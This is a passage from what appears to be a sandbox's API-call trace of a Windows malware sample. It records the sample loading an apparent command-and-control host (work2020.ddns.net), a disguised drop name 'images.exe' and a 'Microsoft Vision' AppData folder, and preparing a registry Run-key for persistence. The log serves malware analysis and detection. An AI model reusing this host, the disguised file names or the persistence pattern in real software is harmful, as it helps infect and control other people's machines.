out: hHeap=0x960000) returned 1 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x98ff20 | out: hHeap=0x960000) returned 1 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99f9c0 | out: hHeap=0x960000) returned 1 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9acbc0 | out: hHeap=0x960000) returned 1 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x9d0b88 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9be7c8 | out: hHeap=0x960000) returned 1 [0074.595] lstrlenA (lpString=".bss") returned 4 [0074.595] lstrlenA (lpString=".bss") returned 4 [0074.595] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x930000 [0074.596] lstrcpyA (in: lpString1=0x930000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0074.596] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.596] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.596] GetProcessHeap () returned 0x960000 [0074.596] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x11c00) returned 0x9abbd8 [0074.596] lstrlenA (lpString=".text") returned 5 [0074.596] lstrlenA (lpString=".text") returned 5 [0074.596] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.596] lstrcpyA (in: lpString1=0x940000, lpString2=".text" | out: lpString1=".text") returned=".text" [0074.596] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0074.597] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.597] GetProcessHeap () returned 0x960000 [0074.597] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9abbd8 | out: hHeap=0x960000) returned 1 [0074.597] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.597] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.597] GetProcessHeap () returned 0x960000 [0074.597] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x4a00) returned 0x99f3d0 [0074.597] lstrlenA (lpString=".rdata") returned 6 [0074.597] lstrlenA (lpString=".rdata") returned 6 [0074.597] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.598] lstrcpyA (in: lpString1=0x940000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0074.598] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0074.598] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.598] GetProcessHeap () returned 0x960000 [0074.598] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99f3d0 | out: hHeap=0x960000) returned 1 [0074.599] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.599] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.599] GetProcessHeap () returned 0x960000 [0074.599] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x600) returned 0x99afb8 [0074.599] lstrlenA (lpString=".data") returned 5 [0074.599] lstrlenA (lpString=".data") returned 5 [0074.599] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.600] lstrcpyA (in: lpString1=0x940000, lpString2=".data" | out: lpString1=".data") returned=".data" [0074.600] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0074.600] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.600] GetProcessHeap () returned 0x960000 [0074.600] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.600] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.600] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.600] GetProcessHeap () returned 0x960000 [0074.600] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x2e00) returned 0x99afb8 [0074.600] lstrlenA (lpString=".rsrc") returned 5 [0074.600] lstrlenA (lpString=".rsrc") returned 5 [0074.600] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.600] lstrcpyA (in: lpString1=0x940000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0074.601] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0074.601] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.601] GetProcessHeap () returned 0x960000 [0074.601] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.601] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.601] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.601] GetProcessHeap () returned 0x960000 [0074.601] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1000) returned 0x99afb8 [0074.601] lstrlenA (lpString=".reloc") returned 6 [0074.601] lstrlenA (lpString=".reloc") returned 6 [0074.601] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.601] lstrcpyA (in: lpString1=0x940000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0074.601] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0074.601] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.602] GetProcessHeap () returned 0x960000 [0074.602] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.602] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.602] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.602] GetProcessHeap () returned 0x960000 [0074.602] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x9d0d90 [0074.602] lstrlenA (lpString=".bss") returned 4 [0074.602] lstrlenA (lpString=".bss") returned 4 [0074.602] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.602] lstrcpyA (in: lpString1=0x940000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0074.602] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0074.602] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9d0d90 | out: hHeap=0x960000) returned 1 [0074.603] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0074.603] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0074.603] GetProcessHeap () returned 0x960000 [0074.603] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x9d0d90 [0074.603] VirtualFree (lpAddress=0x930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x99afb8 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x99b1c0 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1ca) returned 0x99afb8 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1ca) returned 0x99b3c8 [0074.603] GetProcessHeap () returned 0x960000 [0074.603] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1ca) returned 0x99afb8 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x9d0f98 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x99b5a0 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9d0f98 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x9d0f98 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b5a0 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x99b5a0 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1ca) returned 0x99b5e0 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1ca) returned 0x99b7b8 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b5e0 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b5a0 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b3c8 | out: hHeap=0x960000) returned 1 [0074.604] GetProcessHeap () returned 0x960000 [0074.604] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x24) returned 0x97d3b0 [0074.604] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.604] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x930000 [0074.604] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.605] lstrcpyW (in: lpString1=0x930000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0074.605] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.605] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.605] lstrcpyW (in: lpString1=0x940000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0074.605] VirtualFree (lpAddress=0x930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.605] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.605] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x930000 [0074.605] lstrcpyW (in: lpString1=0x930000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0074.605] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.605] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0074.606] GetProcessHeap () returned 0x960000 [0074.606] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x16) returned 0x987238 [0074.606] lstrlenW (lpString="images.exe") returned 10 [0074.606] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.606] lstrlenW (lpString="images.exe") returned 10 [0074.606] lstrcpyW (in: lpString1=0x940000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.606] lstrlenW (lpString="images.exe") returned 10 [0074.606] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x950000 [0074.606] lstrcpyW (in: lpString1=0x950000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.606] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.607] lstrlenW (lpString="images.exe") returned 10 [0074.607] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x940000 [0074.607] lstrcpyW (in: lpString1=0x940000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.607] VirtualFree (lpAddress=0x950000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.607] GetProcessHeap () returned 0x960000 [0074.607] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0xe) returned 0x987968 [0074.607] lstrlenW (lpString="Images") returned 6 [0074.607] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x950000 [0074.608] lstrlenW (lpString="Images") returned 6 [0074.608] lstrcpyW (in: lpString1=0x950000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.608] lstrlenW (lpString="Images") returned 6 [0074.608] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xbf0000 [0074.608] lstrcpyW (in: lpString1=0xbf0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.608] VirtualFree (lpAddress=0x950000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.608] lstrlenW (lpString="Images") returned 6 [0074.608] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x950000 [0074.609] lstrcpyW (in: lpString1=0x950000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.609] VirtualFree (lpAddress=0xbf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.609] GetProcessHeap () returned 0x960000 [0074.609] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x16) returned 0x987278 [0074.609] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.609] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbf0000 [0074.609] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.609] lstrcpyW (in: lpString1=0xbf0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.609] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.609] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xc00000 [0074.610] lstrcpyW (in: lpString1=0xc00000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.610] VirtualFree (lpAddress=0xbf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.610] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.610] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbf0000 [0074.610] lstrcpyW (in: lpString1=0xbf0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.610] VirtualFree (lpAddress=0xc00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.610] GetProcessHeap () returned 0x960000 [0074.610] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b7b8 | out: hHeap=0x960000) returned 1 [0074.611] GetProcessHeap () returned 0x960000 [0074.611] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9d0d90 | out: hHeap=0x960000) returned 1 [0074.611] GetProcessHeap () returned 0x960000 [0074.611] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9d0b88 | out: hHeap=0x960000) returned 1 [0074.611] GetProcessHeap () returned 0x960000 [0074.611] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99e3c8 | out: hHeap=0x960000) returned 1 [0074.611] GetProcessHeap () returned 0x960000 [0074.611] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9a8dd0 | out: hHeap=0x960000) returned 1 [0074.611] GetProcessHeap () returned 0x960000 [0074.612] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99ddc0 | out: hHeap=0x960000) returned 1 [0074.613] GetProcessHeap () returned 0x960000 [0074.613] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9a43c8 | out: hHeap=0x960000) returned 1 [0074.614] GetProcessHeap () returned 0x960000 [0074.614] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9bef80 | out: hHeap=0x960000) returned 1 [0074.614] GetProcessHeap () returned 0x960000 [0074.614] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x98fb18 | out: hHeap=0x960000) returned 1 [0074.614] ReleaseMutex (hMutex=0x1d0) returned 0 [0074.614] CloseHandle (hObject=0x1d0) returned 1 [0074.614] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0074.614] GetProcessHeap () returned 0x960000 [0074.615] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x99afb8 [0074.615] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.615] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xc00000 [0074.615] lstrcpyW (in: lpString1=0xc00000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0074.615] lstrlenW (lpString="images.exe") returned 10 [0074.615] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xc10000 [0074.615] lstrcpyW (in: lpString1=0xc10000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.615] lstrlenW (lpString="Images") returned 6 [0074.615] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xc20000 [0074.616] lstrcpyW (in: lpString1=0xc20000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.616] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.616] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xc30000 [0074.616] lstrcpyW (in: lpString1=0xc30000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.616] GetProcessHeap () returned 0x960000 [0074.616] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x98fb18 [0074.616] GetCurrentProcess () returned 0xffffffff [0074.616] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x31f394 | out: TokenHandle=0x31f394*=0x1d0) returned 1 [0074.616] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x14, TokenInformation=0x31f38c, TokenInformationLength=0x4, ReturnLength=0x31f390 | out: TokenInformation=0x31f38c, ReturnLength=0x31f390) returned 1 [0074.616] CloseHandle (hObject=0x1d0) returned 1 [0074.616] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0074.616] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.617] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0074.617] lstrcpyW (in: lpString1=0xc40000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0074.617] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0074.617] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0xc50000 [0074.617] lstrcpyW (in: lpString1=0xc50000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0074.617] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.617] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.617] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.618] lstrcpyW (in: lpString1=0xc40000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.618] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.618] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0074.618] VirtualQuery (in: lpAddress=0xc50000, lpBuffer=0x31f34c, dwLength=0x1c | out: lpBuffer=0x31f34c*(BaseAddress=0xc50000, AllocationBase=0xc50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0074.618] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xc60000 [0074.618] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.618] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="ZO6KLPO6XJ" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ" [0074.618] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.619] lstrlenW (lpString="inst") returned 4 [0074.619] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.619] lstrlenW (lpString="inst") returned 4 [0074.619] lstrcpyW (in: lpString1=0xc40000, lpString2="inst" | out: lpString1="inst") returned="inst" [0074.619] lstrlenW (lpString="inst") returned 4 [0074.619] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xc50000 [0074.619] lstrcpyW (in: lpString1=0xc50000, lpString2="inst" | out: lpString1="inst") returned="inst" [0074.619] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.619] lstrlenW (lpString="InitWindows") returned 11 [0074.619] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.620] lstrlenW (lpString="InitWindows") returned 11 [0074.620] lstrcpyW (in: lpString1=0xc40000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0074.620] lstrlenW (lpString="InitWindows") returned 11 [0074.620] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xc70000 [0074.620] lstrcpyW (in: lpString1=0xc70000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0074.620] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.620] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0074.620] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.621] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0074.621] lstrcpyW (in: lpString1=0xc40000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0074.621] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0074.621] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0xc80000 [0074.621] lstrcpyW (in: lpString1=0xc80000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0074.621] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.622] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", ulOptions=0x0, samDesired=0xf003f, phkResult=0x31f450 | out: phkResult=0x31f450*=0x0) returned 0x2 [0074.648] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xc40000 [0074.649] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1d0 [0074.649] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x31f81c | out: lpWSAData=0x31f81c) returned 0 [0074.649] GetProcessHeap () returned 0x960000 [0074.649] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x99aff8 [0074.649] lstrlenW (lpString="work2020.ddns.net") returned 17 [0074.649] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xc90000 [0074.649] lstrcpyW (in: lpString1=0xc90000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0074.650] lstrlenW (lpString="images.exe") returned 10 [0074.650] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xca0000 [0074.650] lstrcpyW (in: lpString1=0xca0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.650] lstrlenW (lpString="Images") returned 6 [0074.650] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xcb0000 [0074.650] lstrcpyW (in: lpString1=0xcb0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.650] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0074.650] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xcc0000 [0074.651] lstrcpyW (in: lpString1=0xcc0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0074.651] GetProcessHeap () returned 0x960000 [0074.651] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x98fd20 [0074.651] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xcd0000 [0074.651] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x31f5d8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0074.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0074.653] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 1 [0074.654] GetProcessHeap () returned 0x960000 [0074.654] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x7d0) returned 0x98ff28 [0074.654] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x98ff28, nSize=0x3e8 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe")) returned 0x3a [0074.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe") returned 58 [0074.654] VirtualAlloc (lpAddress=0x0, dwSize=0x76, 